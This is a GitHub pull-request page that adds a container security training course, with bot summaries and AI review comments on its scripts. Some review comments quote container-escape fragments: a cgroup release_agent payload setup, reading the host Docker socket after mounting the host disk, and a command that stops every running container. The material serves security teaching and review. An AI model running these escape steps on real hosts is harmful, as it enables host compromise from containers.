Skip to content

Add Container Security Course content (Phase 1 + Modules 1 & 2)#1

Merged
donny-devops merged 1 commit into
mainfrom
add-container-security-course-content
Jul 5, 2026
Merged

Add Container Security Course content (Phase 1 + Modules 1 & 2)#1
donny-devops merged 1 commit into
mainfrom
add-container-security-course-content

Conversation

@donny-devops

Copy link
Copy Markdown
Owner

Container Security Course Content

This PR adds the complete Phase 1 foundation plus Modules 1 & 2 of the Container Security course, organized under container-security-course/.

Contents (67 files)

Phase 1 Foundations

  • Course outline, course summary eBook, metadata template, README, deliverables summary
  • Available in Markdown, DOCX, and PDF formats

Module 1: Container Security Fundamentals (~35 min)

  • 5 video scripts + module summary script
  • Topics: namespaces/cgroups isolation, container vs VM, shared kernel, Docker daemon hardening, attack surface
  • Module-level questions and metadata

Module 2: Privileged Containers & Attack Vectors (~35 min)

  • 4 video scripts + module summary script
  • Topics: --privileged risks, host compromise, privilege escalation, container escapes, CVE analysis (CVE-2019-5736, CVE-2020-15257, CVE-2022-0185)
  • Module-level questions and metadata

Sample Module (Seccomp)

  • 3 video scripts + questions

Production Standards

  • Full HD 1920x1080 @ 30 FPS
  • 150% UI zoom, 20-22 lines of code per screen
  • Mix of terminal, code editor, PPT, and browser views
  • Word-for-word narration with screen directions and post-production notes

Please review before merging.

Adds the full Container Security video course under
container-security-course/.

Phase 1 (foundation):
- Course outline (md/docx/pdf) and course summary (html/pdf)
- Metadata template (md/docx/pdf) and top-level README
- Sample module (Module 3 - Seccomp) with 3 video scripts and questions
- DELIVERABLES_SUMMARY

Module 1 - Container Security Fundamentals:
- 6 video scripts (5 topic videos + module summary)
- Module summary script, questions, and metadata

Module 2 - Privileged Containers & Attack Vectors:
- 5 video scripts (4 topic videos + module summary)
- Module summary script, questions, and metadata

All content provided in Markdown, DOCX, and PDF formats.
Copilot AI review requested due to automatic review settings July 5, 2026 21:03
@ecc-tools

ecc-tools Bot commented Jul 5, 2026

Copy link
Copy Markdown

Analyzing 200 commits...

@sonarqubecloud

sonarqubecloud Bot commented Jul 5, 2026

Copy link
Copy Markdown

@amazon-q-developer amazon-q-developer Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Review Complete

This PR adds Phase 1 of the Container Security course content, including comprehensive video scripts, module materials, and course documentation. The content is well-structured and professionally prepared educational material.

Content Reviewed:

  • 67 files including course outlines, README, metadata templates
  • Module 1: Container Security Fundamentals (5 video scripts)
  • Module 2: Privileged Containers & Attack Vectors (4 video scripts)
  • Sample module on Seccomp (3 video scripts)
  • Associated questions and metadata files

Security Assessment:
All content is educational material with no actual code implementation. The scripts demonstrate security concepts and attack techniques appropriately labeled for educational purposes with warnings like "⚠️ EDUCATIONAL PURPOSE ONLY" and "Lab Environment" disclaimers.

Findings:
No blocking issues identified. The content functions correctly as educational documentation. All commands and demonstrations are appropriate for a security training course with proper context and warnings.

The PR is ready for merge from a technical review perspective.


You can now have the agent implement changes and create commits directly on your pull request's source branch. Simply comment with /q followed by your request in natural language to ask the agent to make changes.


⚠️ This PR contains more than 30 files. Amazon Q is better at reviewing smaller PRs, and may miss issues in larger changesets.

@ecc-tools

ecc-tools Bot commented Jul 5, 2026

Copy link
Copy Markdown

Analysis Complete

Generated ECC bundle from 1 commits | Confidence: 60%

View Pull Request #2

Repository Profile
Attribute Value
Language TypeScript
Framework Not detected
Commit Convention freeform
Test Directory separate
Changed Files (67)
Metric Value
Files changed 67
Additions 6529
Deletions 0

Top hotspots

Path Status +/-
container-security-course/sample_module/video_03_script.md added +573 / -0
container-security-course/README.md added +511 / -0
container-security-course/sample_module/video_02_script.md added +470 / -0
container-security-course/metadata_template.md added +426 / -0
container-security-course/course_summary.html added +399 / -0

Top directories

Directory Files Total changes
container-security-course 10 1783
container-security-course/sample_module 12 1660
container-security-course/module_02_privileged_containers 21 1550
container-security-course/module_01_fundamentals 24 1536
Analysis Depth Readiness (commit-history, 7%)

ECC Tools uses this to decide whether recommendations should stay at commit-history/setup guidance or expand into CI, security, harness, reference-set, AI-routing, and team backlog work.

Area Status Evidence / Next Step
Commit history Partial 1 commits sampled
CI/CD signals Missing Add workflow files or CI troubleshooting evidence so ECC Tools can reason about pipeline setup.
Security evidence Missing Add AgentShield, audit, SARIF, SBOM, or security review evidence so recommendations can cover security posture.
Harness configuration Missing Add Claude, Codex, OpenCode, Zed, dmux, MCP, plugin, or cross-harness config evidence for harness-agnostic recommendations.
Reference/eval evidence Missing Add fixtures, golden traces, reference sets, or evaluator benchmarks so deeper recommendations have regression evidence.
AI routing and cost controls Missing Add model-routing, budget, usage, or cost-control files before relying on AI-heavy automation recommendations.
Team handoff and project tracking Missing Add roadmap, runbook, project, Linear, or follow-up tracking docs so generated work can land in a team queue.
Reference Set Readiness (0/7, 0%)
Area Status Evidence / Next Step
Deep analyzer corpus Missing Add analyzer fixture, golden, benchmark, or reference-set files that can catch analyzer regressions.
RAG/evaluator comparison Missing Add retrieval or evaluator reference-set comparison fixtures with expected ranking behavior.
PR salvage/review corpus Missing Add stale-PR, review-thread, reopen-flow, or salvage reference cases for queue cleanup automation.
Discussion triage corpus Missing Add public discussion triage fixtures, golden cases, or reference sets for informational, answered, and no-response classifications.
Harness compatibility Missing Add cross-harness, adapter-compliance, or harness-audit evidence for Claude, Codex, OpenCode, Zed, dmux, and agent surfaces.
Security evidence Missing Attach security evidence such as SBOMs, SARIF, audit reports, or AgentShield evidence packs.
CI failure-mode evidence Missing Add captured CI failure logs, dry-run fixtures, or troubleshooting docs for common workflow failure modes.
Review Activity (1 reviews, 0 inline comments, 0 unresolved threads)
Signal Count
Approvals 0
Change requests 0
Comment-only reviews 1
Dismissed reviews 0
Pending reviews 0
Review threads 0
Unresolved threads 0
Outdated threads 0
Latest review Commented
Latest submitted at 2026-07-05T21:04:03Z

Latest reviewer states

Reviewer State Submitted
@Amazon-Q-Developer[bot] Commented 2026-07-05T21:04:03Z
Review Follow-up Signals (1)
Severity Signal Evidence
MEDIUM Get an explicit approval No approving review is recorded for this PR

Recommended next actions

  • Ask for an approval after requested changes and unresolved discussions are addressed.
Detected Workflows (2)
Workflow Description
add-new-course-module Adds a new module to the container security course, including scripts, questions, metadata, and summary, in multiple formats.
add-multiformat-course-document Adds or updates course-wide documents (outline, summary, metadata template) in multiple formats (md, docx, pdf, html).
Generated Instincts (17)
Domain Count
git 2
code-style 9
testing 2
workflow 4

After merging, import with:

/instinct-import .claude/homunculus/instincts/inherited/docker-hacking-lab-instincts.yaml

Files

  • .claude/ecc-tools.json
  • .claude/skills/docker-hacking-lab/SKILL.md
  • .agents/skills/docker-hacking-lab/SKILL.md
  • .agents/skills/docker-hacking-lab/agents/openai.yaml
  • .claude/identity.json
  • .codex/config.toml
  • .codex/AGENTS.md
  • .codex/agents/explorer.toml
  • .codex/agents/reviewer.toml
  • .codex/agents/docs-researcher.toml
  • .claude/homunculus/instincts/inherited/docker-hacking-lab-instincts.yaml
  • .claude/commands/add-new-course-module.md
  • .claude/commands/add-multiformat-course-document.md

ECC Tools | Everything Claude Code

@donny-devops donny-devops merged commit f6b5263 into main Jul 5, 2026
7 checks passed
@qodo-code-review

Copy link
Copy Markdown

PR Summary by Qodo

Add Container Security course package (Phase 1 + Modules 1–2)

📝 Documentation ✨ Enhancement 🕐 40+ Minutes

Grey Divider

AI Description

• Add Phase 1 course deliverables (outline, summary source, metadata template, README).
• Add production-ready scripts, metadata, and assessments for Modules 1 and 2.
• Include Seccomp sample module scripts and question bank for review baseline.
Diagram

graph TD
  A["container-security-course/"] --> B["Foundations"] --> C["Outline/summary"]
  A --> D["Module 1"] --> E["Scripts + metadata + Qs"]
  A --> F["Module 2"] --> G["Scripts + metadata + Qs"]
  A --> H["Sample module"]
Loading
High-Level Assessment

The following are alternative approaches to this PR:

1. Single-source content + generated DOCX/PDF via build pipeline
  • ➕ Avoids committing duplicated formats (MD/DOCX/PDF)
  • ➕ Makes global edits/search/consistency checks easier
  • ➕ Reduces long-term repo size growth
  • ➖ Requires tooling/CI decisions (Pandoc/Quarto/etc.) and maintenance
  • ➖ May need significant formatting tuning to match publisher requirements
2. Store binary deliverables (DOCX/PDF) in Git LFS or release artifacts
  • ➕ Keeps git history lean while still distributing required formats
  • ➕ Improves clone/fetch performance for contributors
  • ➖ Adds infra/process complexity (LFS quotas, artifact hosting, access control)
  • ➖ Some reviewers prefer binaries co-located with source during early iterations

Recommendation: The current approach (checking in the full content package, including DOCX/PDF counterparts) is acceptable for Phase 1 / early review where stakeholders need complete deliverables in-repo. If this course will iterate frequently, consider moving binaries to Git LFS or generating them from Markdown in CI to reduce duplication and repository bloat.

Files changed (45) +6529 / -0

Documentation (45) +6529 / -0
DELIVERABLES_SUMMARY.txtAdd deliverables manifest for Modules 1–2 +137/-0

Add deliverables manifest for Modules 1–2

• Introduces a readable summary of delivered module content, durations, and topical coverage for the package.

container-security-course/DELIVERABLES_SUMMARY.txt

README.mdAdd Phase 1 package README with structure and standards +511/-0

Add Phase 1 package README with structure and standards

• Documents package contents, directory layout, deliverables checklist, and production standards for reviewers/approvers.

container-security-course/README.md

course_outline.docxAdd DOCX version of the course outline +0/-0

Add DOCX version of the course outline

• Adds the Word-formatted course outline deliverable for publisher/workflow compatibility.

container-security-course/course_outline.docx

course_outline.mdAdd full course outline in Markdown +310/-0

Add full course outline in Markdown

• Defines the end-to-end course structure with modules, objectives, lessons/labs, and timing estimates.

container-security-course/course_outline.md

course_summary.htmlAdd course summary eBook source (HTML) +399/-0

Add course summary eBook source (HTML)

• Adds styled HTML content intended for rendering/export to a course summary PDF/eBook.

container-security-course/course_summary.html

metadata_template.docxAdd DOCX version of the metadata template +0/-0

Add DOCX version of the metadata template

• Adds a Word-formatted metadata template for reuse across course videos.

container-security-course/metadata_template.docx

metadata_template.mdAdd standardized video metadata template (Markdown) +426/-0

Add standardized video metadata template (Markdown)

• Defines a reusable YAML metadata structure covering titles, objectives, prerequisites, and technical specs.

container-security-course/metadata_template.md

metadata.docxAdd Module 1 metadata (DOCX) +0/-0

Add Module 1 metadata (DOCX)

• Adds Word-formatted metadata for Module 1 deliverables.

container-security-course/module_01_fundamentals/metadata.docx

metadata.mdAdd Module 1 complete metadata (Markdown) +132/-0

Add Module 1 complete metadata (Markdown)

• Provides per-video metadata for Module 1 including objectives, resources, key commands, and screen mix.

container-security-course/module_01_fundamentals/metadata.md

module_summary_script.docxAdd Module 1 summary script (DOCX) +0/-0

Add Module 1 summary script (DOCX)

• Adds Word-formatted narration/script for the Module 1 overview video.

container-security-course/module_01_fundamentals/module_summary_script.docx

module_summary_script.mdAdd Module 1 summary script (Markdown) +94/-0

Add Module 1 summary script (Markdown)

• Introduces the Module 1 overview script with timing, slide guidance, and narration cues.

container-security-course/module_01_fundamentals/module_summary_script.md

questions.docxAdd Module 1 assessment questions (DOCX) +0/-0

Add Module 1 assessment questions (DOCX)

• Adds Word-formatted MCQs for Module 1 and its final assessment contribution.

container-security-course/module_01_fundamentals/questions.docx

questions.mdAdd Module 1 assessment questions (Markdown) +87/-0

Add Module 1 assessment questions (Markdown)

• Defines module-level and final assessment MCQs with answers and explanations for Module 1 topics.

container-security-course/module_01_fundamentals/questions.md

video_01_script.docxAdd Module 1 Video 1 script (DOCX) +0/-0

Add Module 1 Video 1 script (DOCX)

• Adds Word-formatted script for the container isolation/namespaces lesson.

container-security-course/module_01_fundamentals/video_01_script.docx

video_01_script.mdAdd Video 1.1 script: container isolation fundamentals +270/-0

Add Video 1.1 script: container isolation fundamentals

• Adds full narration and screen directions for container architecture/isolation demonstrations (namespaces/cgroups/filesystems).

container-security-course/module_01_fundamentals/video_01_script.md

video_02_script.docxAdd Module 1 Video 2 script (DOCX) +0/-0

Add Module 1 Video 2 script (DOCX)

• Adds Word-formatted script for the container vs VM security lesson.

container-security-course/module_01_fundamentals/video_02_script.docx

video_02_script.mdAdd Video 1.2 script: container vs VM security models +217/-0

Add Video 1.2 script: container vs VM security models

• Adds a production-ready script comparing container/VM isolation and discussing representative escape CVEs and decision criteria.

container-security-course/module_01_fundamentals/video_02_script.md

video_03_script.docxAdd Module 1 Video 3 script (DOCX) +0/-0

Add Module 1 Video 3 script (DOCX)

• Adds Word-formatted script covering shared-kernel security implications.

container-security-course/module_01_fundamentals/video_03_script.docx

video_03_script.mdAdd Video 1.3 script: shared kernel risk +213/-0

Add Video 1.3 script: shared kernel risk

• Provides narration and demos explaining why shared-kernel architecture drives container risk and patching urgency.

container-security-course/module_01_fundamentals/video_03_script.md

video_04_script.docxAdd Module 1 Video 4 script (DOCX) +0/-0

Add Module 1 Video 4 script (DOCX)

• Adds Word-formatted script for Docker daemon hardening content.

container-security-course/module_01_fundamentals/video_04_script.docx

video_04_script.mdAdd Video 1.4 script: Docker daemon security and config +307/-0

Add Video 1.4 script: Docker daemon security and config

• Adds a script focused on Docker architecture, daemon socket risk, and hardening guidance with terminal/code walkthroughs.

container-security-course/module_01_fundamentals/video_04_script.md

video_05_script.docxAdd Module 1 Video 5 script (DOCX) +0/-0

Add Module 1 Video 5 script (DOCX)

• Adds Word-formatted script for container attack surface mapping.

container-security-course/module_01_fundamentals/video_05_script.docx

video_05_script.mdAdd Video 1.5 script: container attack surface mapping +216/-0

Add Video 1.5 script: container attack surface mapping

• Introduces a script that inventories container attack surface layers and common risky runtime configurations.

container-security-course/module_01_fundamentals/video_05_script.md

metadata.docxAdd Module 2 metadata (DOCX) +0/-0

Add Module 2 metadata (DOCX)

• Adds Word-formatted metadata for Module 2 deliverables.

container-security-course/module_02_privileged_containers/metadata.docx

metadata.mdAdd Module 2 complete metadata (Markdown) +118/-0

Add Module 2 complete metadata (Markdown)

• Provides per-video metadata for Module 2 including offensive demos, prerequisites, resources, and screen mix.

container-security-course/module_02_privileged_containers/metadata.md

module_summary_script.docxAdd Module 2 summary script (DOCX) +0/-0

Add Module 2 summary script (DOCX)

• Adds Word-formatted narration/script for the Module 2 overview video.

container-security-course/module_02_privileged_containers/module_summary_script.docx

module_summary_script.mdAdd Module 2 summary script (Markdown) +94/-0

Add Module 2 summary script (Markdown)

• Introduces the module overview script framing privileged containers, escape paths, and CVE walk-throughs.

container-security-course/module_02_privileged_containers/module_summary_script.md

questions.docxAdd Module 2 assessment questions (DOCX) +0/-0

Add Module 2 assessment questions (DOCX)

• Adds Word-formatted MCQs for Module 2 and its final assessment contribution.

container-security-course/module_02_privileged_containers/questions.docx

questions.mdAdd Module 2 assessment questions (Markdown) +86/-0

Add Module 2 assessment questions (Markdown)

• Defines module-level and final assessment MCQs with answers and explanations for privileged/escape topics.

container-security-course/module_02_privileged_containers/questions.md

video_01_script.docxAdd Module 2 Video 1 script (DOCX) +0/-0

Add Module 2 Video 1 script (DOCX)

• Adds Word-formatted script explaining '--privileged' behavior and risks.

container-security-course/module_02_privileged_containers/video_01_script.docx

video_01_script.mdAdd Video 2.1 script: privileged containers and risks +288/-0

Add Video 2.1 script: privileged containers and risks

• Adds a script detailing what '--privileged' disables/enables and safer alternatives plus detection guidance.

container-security-course/module_02_privileged_containers/video_01_script.md

video_02_script.docxAdd Module 2 Video 2 script (DOCX) +0/-0

Add Module 2 Video 2 script (DOCX)

• Adds Word-formatted script for host compromise demonstrations.

container-security-course/module_02_privileged_containers/video_02_script.docx

video_02_script.mdAdd Video 2.2 script: host compromise from privileged containers +315/-0

Add Video 2.2 script: host compromise from privileged containers

• Provides a step-by-step demo script for mounting host filesystems, harvesting credentials, and establishing persistence.

container-security-course/module_02_privileged_containers/video_02_script.md

video_03_script.docxAdd Module 2 Video 3 script (DOCX) +0/-0

Add Module 2 Video 3 script (DOCX)

• Adds Word-formatted script for escalation and escape techniques.

container-security-course/module_02_privileged_containers/video_03_script.docx

video_03_script.mdAdd Video 2.3 script: privilege escalation and escape techniques +292/-0

Add Video 2.3 script: privilege escalation and escape techniques

• Introduces a production-ready script covering escalation paths and container escape primitives/techniques.

container-security-course/module_02_privileged_containers/video_03_script.md

video_04_script.docxAdd Module 2 Video 4 script (DOCX) +0/-0

Add Module 2 Video 4 script (DOCX)

• Adds Word-formatted script for real-world CVE analysis and exploitation.

container-security-course/module_02_privileged_containers/video_04_script.docx

video_04_script.mdAdd Video 2.4 script: CVE analysis and exploitation flows +357/-0

Add Video 2.4 script: CVE analysis and exploitation flows

• Adds a script analyzing container escape CVEs (runc/containerd/kernel) with exploit-chain walkthroughs and remediation guidance.

container-security-course/module_02_privileged_containers/video_04_script.md

module_questions.docxAdd sample module questions (DOCX) +0/-0

Add sample module questions (DOCX)

• Adds Word-formatted question bank for the Seccomp sample module.

container-security-course/sample_module/module_questions.docx

module_questions.mdAdd sample module question bank (Markdown) +279/-0

Add sample module question bank (Markdown)

• Defines Seccomp-focused MCQs with explanations and troubleshooting tips to validate assessment format.

container-security-course/sample_module/module_questions.md

video_01_script.docxAdd sample video 1 script (DOCX) +0/-0

Add sample video 1 script (DOCX)

• Adds Word-formatted script for sample Seccomp lesson 1.

container-security-course/sample_module/video_01_script.docx

video_01_script.mdAdd sample script: Seccomp introduction +338/-0

Add sample script: Seccomp introduction

• Introduces a production-ready script for explaining Seccomp fundamentals and motivation.

container-security-course/sample_module/video_01_script.md

video_02_script.docxAdd sample video 2 script (DOCX) +0/-0

Add sample video 2 script (DOCX)

• Adds Word-formatted script for sample Seccomp lesson 2.

container-security-course/sample_module/video_02_script.docx

video_02_script.mdAdd sample script: building custom Seccomp profiles +470/-0

Add sample script: building custom Seccomp profiles

• Adds a detailed script for creating and testing custom Seccomp profiles with a practical workflow.

container-security-course/sample_module/video_02_script.md

video_03_script.docxAdd sample video 3 script (DOCX) +0/-0

Add sample video 3 script (DOCX)

• Adds Word-formatted script for sample Seccomp lesson 3.

container-security-course/sample_module/video_03_script.docx

video_03_script.mdAdd sample script: Seccomp troubleshooting and best practices +573/-0

Add sample script: Seccomp troubleshooting and best practices

• Provides a deep-dive script for debugging blocked syscalls and operationalizing Seccomp safely.

container-security-course/sample_module/video_03_script.md

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 7c36289c13

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".


**[TYPE:]**
```bash
docker stop $(docker ps -q)

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P2 Badge Stop only the nginx trace container

This cleanup command uses every ID returned by docker ps -q; Docker documents ps as showing running containers by default and -q as only displaying their IDs, while docker stop accepts one or more containers. In any lab host that already has the repo's compose stack or other workloads running, this will stop unrelated containers, and the earlier docker exec $(docker ps -q) can also target the wrong container or fail with multiple IDs. Name the tracing container and stop/exec that specific name instead.

Useful? React with 👍 / 👎.

Your organization discovers that all production hosts are running a Linux kernel version affected by CVE-2022-0185 (heap overflow in filesystem context handling, exploitable with CAP_SYS_ADMIN). Your containers run with default Docker settings (no `--privileged`, no extra capabilities). An operations engineer suggests that since no containers have CAP_SYS_ADMIN, the hosts are not at risk. Is this assessment correct?

**A)** Yes — without CAP_SYS_ADMIN in any container, the vulnerability cannot be exploited, so patching can be deferred
**B)** Partially — the direct exploit requires CAP_SYS_ADMIN, but if unprivileged user namespaces are enabled on the host, any container process can create a user namespace and obtain CAP_SYS_ADMIN within it, potentially triggering the vulnerability. The kernel must still be patched

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P2 Badge Correct the default-Docker CVE answer

For the stated scenario of default Docker settings with no extra capabilities, this answer teaches an exploit path that the default seccomp policy prevents: Docker's default profile is an allowlist with SCMP_ACT_ERRNO, and the current profile only allows fsconfig when the container is configured with CAP_SYS_ADMIN; default containers also cannot freely unshare a user namespace. As written, the assessment marks the seccomp-based option wrong even though that mitigation is exactly what changes the risk in this environment, so students will learn the wrong operational conclusion unless the question is scoped to unconfined/custom-seccomp containers.

Useful? React with 👍 / 👎.


```bash
# Access Docker socket on the host
/ # ls -la /mnt/host/var/run/docker.sock

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P2 Badge Do not expect the Docker socket after a raw disk mount

This step follows the earlier mount /dev/sda2 /mnt/host, which mounts only the host's root filesystem from disk and does not include live tmpfs mounts such as /run//var/run. On a normal Linux host, /var/run/docker.sock lives in that tmpfs, so it will not appear under /mnt/host/var/run/docker.sock and the subsequent chrooted docker ps demo will fail; use a bind mount of / or explicitly explain/mount the runtime filesystem before relying on the socket.

Useful? React with 👍 / 👎.


**[TYPE COMMAND:]**
```bash
docker run --rm --name nginx-trace nginx:alpine /bin/sh -c "strace -c nginx -g 'daemon off;' 2>&1" | head -40

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P2 Badge Install strace before running it in nginx:alpine

This first discovery command runs strace inside the stock nginx:alpine image, but that image does not include strace by default; the later command correctly uses apk add strace first. As written, the opening demo fails with strace: not found before any syscall summary is produced, so the script should either install it here too or use a prepared image that contains it.

Useful? React with 👍 / 👎.

@gemini-code-assist gemini-code-assist Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code Review

This pull request delivers the complete content for Modules 1 and 2 of the Container Security Masterclass, including video scripts, metadata, and assessment questions. The review feedback highlights several documentation inconsistencies in the README and course outline that need to be updated to match the final delivered structure. Additionally, a typo was identified in the sed commands within the Module 2 scripts, where \perdir should be corrected to upperdir for robust parsing of OverlayFS mount options.

Important

The consumer version of Gemini Code Assist on GitHub is being sunset. Starting June 18, 2026, new organization installations will be blocked, and all code review activity will officially cease on July 17, 2026.
For more details on the timeline and next steps, please review the Help Documentation.

Comment on lines +27 to +41
## 📁 Directory Structure

```
container_security_course/
├── README.md # This file
├── course_outline.md # Complete course structure
├── course_summary.pdf # 6-page course overview
├── course_summary.html # Source HTML for PDF
├── metadata_template.md # Video metadata standard
└── sample_module/ # Module 3: Seccomp Profiles
├── video_01_script.md # Introduction to Seccomp (12-14 min)
├── video_02_script.md # Creating Custom Profiles (14-16 min)
├── video_03_script.md # Troubleshooting & Best Practices (14-15 min)
└── module_questions.md # 3 module + 2 final assessment MCQs
```

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

medium

The directory structure in the README is outdated and does not reflect the newly added module_01_fundamentals/ and module_02_privileged_containers/ directories. Updating this section will ensure the documentation remains accurate and helpful for students and reviewers.

Comment on lines +65 to +72
**Modules:**
1. Course Introduction (15-20 min)
2. Container Security Fundamentals (30-35 min)
3. Attack Vectors and Vulnerabilities (35-40 min)
4. **Seccomp Profiles in Practice** (40-45 min) ⭐ Sample Module
5. AppArmor and SELinux (30-35 min)
6. Orchestration and Supply Chain Security (30-35 min)
7. Conclusion (10-15 min)

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

medium

The module list and numbering in the README are inconsistent with course_outline.md and the actual delivered directories. In course_outline.md, the course introduction is Module 0, making the subsequent modules 0-indexed (Module 1 to Module 6). Additionally, Module 2 has been renamed to 'Privileged Containers & Attack Vectors' to match the delivered content. Let's update this list to maintain consistency.

Comment on lines +34 to +54
## Module 1: Container Security Fundamentals
**Duration:** 30-35 minutes

### Videos:
1. **Container Isolation Deep Dive** (10-12 mins)
- How containers actually work (namespaces, cgroups)
- The shared kernel reality
- Isolation vs. virtualization
- **Demo:** Examining namespace isolation with live commands

2. **Privileged Containers: The Security Nightmare** (10-12 mins)
- What makes a container privileged
- Capabilities and their risks
- **Lab:** Creating and examining privileged containers
- **Demo:** Breaking out of a privileged container

3. **Container APIs and Attack Surface** (10-11 mins)
- Docker daemon socket exposure
- Remote API vulnerabilities
- **Demo:** Exploiting exposed Docker socket
- Securing container APIs

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

medium

The video list and descriptions for Module 1 in the course outline do not match the actual delivered videos under module_01_fundamentals/. The delivered module has 5 videos (plus a summary) instead of the 3 originally planned. Let's update the outline to accurately reflect the final course structure.

Comment on lines +69 to +91
## Module 2: Container Attack Vectors and Vulnerabilities
**Duration:** 35-40 minutes

### Videos:
1. **Container Escape Techniques** (12-15 mins)
- Kernel exploits through containers
- Capability abuse scenarios
- **Demo:** CVE-based container escape (using safe examples)
- Detection and prevention strategies

2. **Image Security and Tampering** (12-13 mins)
- Malicious image analysis
- Supply chain attacks on images
- **Lab:** Analyzing a compromised image
- Image signing and verification with Docker Content Trust
- **Demo:** Setting up content trust

3. **Insecure Configurations and DoS Attacks** (11-12 mins)
- Common misconfigurations (volume mounts, network modes)
- Resource limit bypasses
- **Demo:** Fork bomb and resource exhaustion attacks
- Implementing resource constraints
- **Lab:** Configuring secure container limits

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

medium

The video list, title, and descriptions for Module 2 in the course outline do not match the actual delivered videos under module_02_privileged_containers/. The delivered module has been renamed to 'Privileged Containers & Attack Vectors' and contains 4 videos (plus a summary) instead of the 3 originally planned. Let's update the outline to keep it in sync with the delivered content.


# Set the release agent to our payload (runs on HOST)
/ # host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
/ # echo "$host_path/cmd" > /tmp/cgrp/release_agent

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

medium

The sed command uses \perdir to parse the OverlayFS mount options from /etc/mtab. This is a common typo/corruption of upperdir found in various online container escape write-ups (likely caused by \u in \upperdir being stripped or corrupted by markdown/string parsers). While .*\perdir technically still works in some sed implementations because .* consumes the u and \p matches p, it is highly non-standard, fragile, and confusing. Replacing it with upperdir makes the regex correct, robust, and readable.

/ # echo 1 > /tmp/cgrp/exploit/notify_on_release

# Get the container's overlay path on the host
/ # host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

medium

The sed command uses \perdir to parse the OverlayFS mount options from /etc/mtab. This is a common typo/corruption of upperdir found in various online container escape write-ups (likely caused by \u in \upperdir being stripped or corrupted by markdown/string parsers). While .*\perdir technically still works in some sed implementations because .* consumes the u and \p matches p, it is highly non-standard, fragile, and confusing. Replacing it with upperdir makes the regex correct, robust, and readable.

@qodo-code-review

Copy link
Copy Markdown

Code Review by Qodo

🐞 Bugs (3) 📘 Rule violations (0) 📜 Skill insights (0)

Context used
✅ Compliance rules (platform): 1 rule

Grey Divider


Remediation recommended

1. Wrong directory name shown 🐞 Bug ≡ Correctness
Description
container-security-course/README.md’s directory tree shows the root folder as
container_security_course/, but the actual folder name in this repo is
container-security-course/. This makes the documented directory layout incorrect for copy/paste
and navigation.
Code

container-security-course/README.md[R29-36]

+```
+container_security_course/
+├── README.md                          # This file
+├── course_outline.md                  # Complete course structure
+├── course_summary.pdf                 # 6-page course overview
+├── course_summary.html                # Source HTML for PDF
+├── metadata_template.md               # Video metadata standard
+└── sample_module/                     # Module 3: Seccomp Profiles
Evidence
The README’s directory structure block explicitly uses container_security_course/ as the root
folder, which does not match the actual repo path (container-security-course/).

container-security-course/README.md[27-41]

Agent prompt
The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
`container-security-course/README.md` documents the package root folder as `container_security_course/` (underscores), but the real folder in the repository is `container-security-course/` (hyphens). This makes the directory structure snippet wrong.

## Issue Context
The README is located under `container-security-course/`, so the tree should reflect that exact directory name.

## Fix Focus Areas
- container-security-course/README.md[27-41]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools


2. README phase scope mismatch 🐞 Bug ⚙ Maintainability
Description
container-security-course/README.md states the package is Phase 1 (planning + sample module), but
the repo content and deliverables summary indicate Phase 2 deliverables for Modules 1 & 2 are
included. This inconsistency can mislead reviewers/users about what content is actually present.
Code

container-security-course/README.md[R1-16]

+# Container Security Course - Phase 1 Package
+## Complete Course Development Deliverables
+
+**Course Title:** Container Security: From Basics to Advanced Protection  
+**Duration:** 3.5-4 hours  
+**Level:** Intermediate  
+**Format:** Video-based with hands-on labs  
+**Phase:** 1 (Planning & Sample Module)  
+**Delivery Date:** July 5, 2026
+
+---
+
+## 📦 Package Contents
+
+This Phase 1 package contains everything needed to evaluate, approve, and begin production of the complete container security course. All deliverables meet publisher technical requirements.
+
Evidence
README claims Phase 1 scope, while DELIVERABLES_SUMMARY explicitly states Phase 2 Modules 1 & 2
content; module metadata files confirm Module 1 and 2 deliverables exist in the package.

container-security-course/README.md[1-16]
container-security-course/DELIVERABLES_SUMMARY.txt[1-12]
container-security-course/module_01_fundamentals/metadata.md[1-15]
container-security-course/module_02_privileged_containers/metadata.md[1-15]

Agent prompt
The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
`container-security-course/README.md` describes the package as Phase 1 (planning + sample module), but the PR includes completed content for Modules 1 and 2 (and the deliverables summary calls it Phase 2). This mismatch can cause readers to overlook Modules 1 & 2 or misunderstand what the package contains.

## Issue Context
The repository now contains full Module 1 and Module 2 deliverables (metadata/scripts/questions), and `DELIVERABLES_SUMMARY.txt` describes them as Phase 2.

## Fix Focus Areas
- container-security-course/README.md[1-20]
- container-security-course/README.md[27-41]
- container-security-course/DELIVERABLES_SUMMARY.txt[1-12]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools


